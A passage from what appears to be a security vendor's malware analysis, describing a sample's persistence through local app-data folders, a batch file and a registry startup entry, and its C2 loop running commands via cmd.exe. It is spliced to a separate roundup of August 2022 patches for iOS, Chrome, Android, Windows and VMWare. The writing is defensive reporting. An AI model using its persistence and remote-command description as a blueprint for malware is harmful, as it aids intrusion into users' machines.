The malware payload copies itself into **%localappdata%\\microsoft\\vault**\\ and creates and executes a batch file in the same folder called update.bat. The .bat file creates the directory **%LOCALAPPDATA%\\microsoft\\windows\\MsSafety** and adds another copy of **msdllupdate.exe** to that folder. For this file, a startup entry is created in the registry to achieve persistence.

The malware connects to a C2 server and goes into an infinite loop waiting for commands from the C2. Three commands are supported:

*   **sleep** to change timeout between C2 requests
*   **timeout** to change timeout parameter in nslookup request
*   all other commands will be executed with “**cmd.exe /c**”

Basically this allows the threat actor to execute arbitrary code on the affected machine.

**Mitigation**

Malwarebytes customers were protected right from the start since Malwarebytes detected the Msdllupdate.exe file without requiring any updates. Our detection engine identified it as malicious by using our generic criteria for suspicious files.

The Malwarebytes web protection engine will also block traffic to the C2 servers involved in this campaign and the domains hosting malware files.

Stay safe, everyone!

James Webb telescope images used to hide malware

Plus: Chrome patches another zero-day flaw, Microsoft closes up 100 vulnerabilities, Android gets a significant patch, and more.

August was a bumper month for security patches, with Apple, Google, and Microsoft among the firms issuing emergency fixes for already exploited vulnerabilities. The month also saw some big fixes arriving from the likes of VMWare, Cisco, IBM, and Zimbra.

Here’s everything you need to know about the important security fixes issued in August.

Apple iOS 15.6.1

After a two-month patch hiatus, followed by multiple fixes in July, Apple released an emergency security update in August with iOS 15.6.1. The iOS update fixed two flaws, both of which were being used by attackers in the wild.

It is thought that the vulnerabilities in WebKit (CVE-2022-32893) and the Kernel (CVE-2022-32894) were being chained together in attacks, with serious consequences. A successful attack could allow an adversary to take control of your iPhone and access your sensitive files and banking details.

Combining the two flaws “typically provides all the functionality needed to mount a device jailbreak,” bypassing almost all Apple-imposed security restrictions, Paul Ducklin, a principal research scientist at Sophos, wrote in a blog analyzing the vulnerabilities. This would potentially allow adversaries to “install background spyware and keep you under comprehensive surveillance,” Ducklin explained.

Apple always avoids giving out details about vulnerabilities until most people have updated, so it’s hard to know who the attack targets were. To ensure you are safe, you should update your devices to iOS 15.6.1 without delay.

Apple also released iPadOS 15.6.1, watchOS 8.7.1, and macOS Monterey 12.5.1, all of which you should update at the next opportunity.

Google Chrome

Google released a security update in August to fix its fifth zero-day flaw this year. In an advisory, Google listed 11 vulnerabilities fixed in August. The patches include a use-after-free flaw in FedCM—tracked as CVE-2022-2852 and rated as critical—as well as six highly rated issues and three classed as having a medium impact. One of the highly rated vulnerabilities has been exploited by attackers, CVE-2022-2856.

Google hasn’t provided any detail about the exploited flaw, but since attackers have gotten ahold of the details, it’s a good idea to update Chrome now.

Earlier in August, Google released Chrome 104, fixing 27 vulnerabilities, seven of which were rated as having a high impact.

Google Android

The August Android security patch was a hefty one, with dozens of fixes for serious vulnerabilities, including a flaw in the framework that could lead to local privilege escalation with no additional privileges needed. Meanwhile, an issue in the media framework could lead to remote information disclosure, and a flaw in the system could lead to remote code execution over Bluetooth. A vulnerability in kernel components could also lead to local escalation of privileges.

The Android security patch was late in August, but it’s now available on such devices as Google’s Pixel range, the Nokia T20, and Samsung Galaxy devices (including the Galaxy S series, Galaxy Note series, Galaxy Fold series, and Galaxy Flip series).

Microsoft

Microsoft’s August Patch Tuesday fixed over 100 security flaws, of which 17 are rated as critical. Among the fixes was a patch for an already exploited flaw tracked as CVE-2022-34713, also known as DogWalk.

The remote code execution (RCE) flaw in the Windows Support Diagnostic Tool (MDST) is rated as having a high impact because exploiting it can result in a system compromise. The vulnerability, which affects all users of Windows and Windows Server, was first exposed over two years ago in January 2020, but Microsoft didn’t consider it a security issue at the time.

VMWare

VMWare fixed a bunch of flaws in August, including a critical authentication bypass bug tracked as CVE-2022-31656. On releasing the patch, the software firm warned that public exploit code is available.

VMWare also fixed an RCE vulnerability in VMware Workspace ONE Access, Identity Manager, and Aria Automation (formerly vRealize Automation), tracked as CVE-2022-31658 with a CVSS score of eight. Meanwhile, a SQL injection RCE vulnerability found in VMware Workspace ONE Access and Identity Manager also got a CVSS score of eight. Both require an attacker to have administrator and network access before they can trigger remote code execution.

Tag

#windows